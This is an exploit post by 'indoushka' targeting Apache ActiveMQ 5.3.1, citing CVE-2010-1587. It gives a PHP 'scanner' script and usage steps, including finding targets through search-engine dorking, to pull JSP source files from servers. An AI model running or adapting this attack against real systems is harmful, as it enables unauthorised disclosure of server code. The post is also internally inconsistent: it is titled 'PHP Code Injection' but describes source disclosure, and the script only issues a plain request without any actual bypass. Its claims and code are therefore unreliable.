=============================================================================================================================================
| # Title     : Apache ActiveMQ 5.3.1 PHP Code Injection Vulnerability                                                                      |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
| # Vendor    : https://activemq.apache.org/components/classic/download/classic-05-03-01                                                    |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description: This code is written in PHP and aims to exploit a vulnerability in Apache ActiveMQ that allows the source code of JSP files stored on the target server to be exposed.
	
	( https://packetstorm.news/files/id/181098/		CVE-2010-1587 )
	
[+] save code as poc.php.

[+] Set Target : line 45

[+] USage : php poc.php 

[+] PayLoad :

<?php

class ApacheActiveMQScanner {
    private $target;
    private $port;
    private $targetUri;
    
    public function __construct($target, $port = 8161, $targetUri = '/admin/index.jsp') {
        $this->target = $target;
        $this->port = $port;
        $this->targetUri = $targetUri;
    }
    
    public function run() {
        echo "Scanning {$this->target}:{$this->port}...\n";
        
        $url = "http://{$this->target}:{$this->port}{$this->targetUri}";
        
        $response = $this->sendRequest($url);
        
        if ($response !== false && strpos($response, '<') === false) {
            $this->saveFile($response);
            echo "File saved successfully!\n";
        } else {
            echo "Failed to retrieve file.\n";
        }
    }
    
    private function sendRequest($url) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        $response = curl_exec($ch);
        curl_close($ch);
        return $response;
    }
    
    private function saveFile($contents) {
        $filename = basename($this->targetUri);
        file_put_contents($filename, $contents);
        echo "File saved as: {$filename}\n";
    }
}

$scanner = new ApacheActiveMQScanner('127.0.0.1'); // ضع عنوان الهدف هنا
$scanner->run();

?>


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================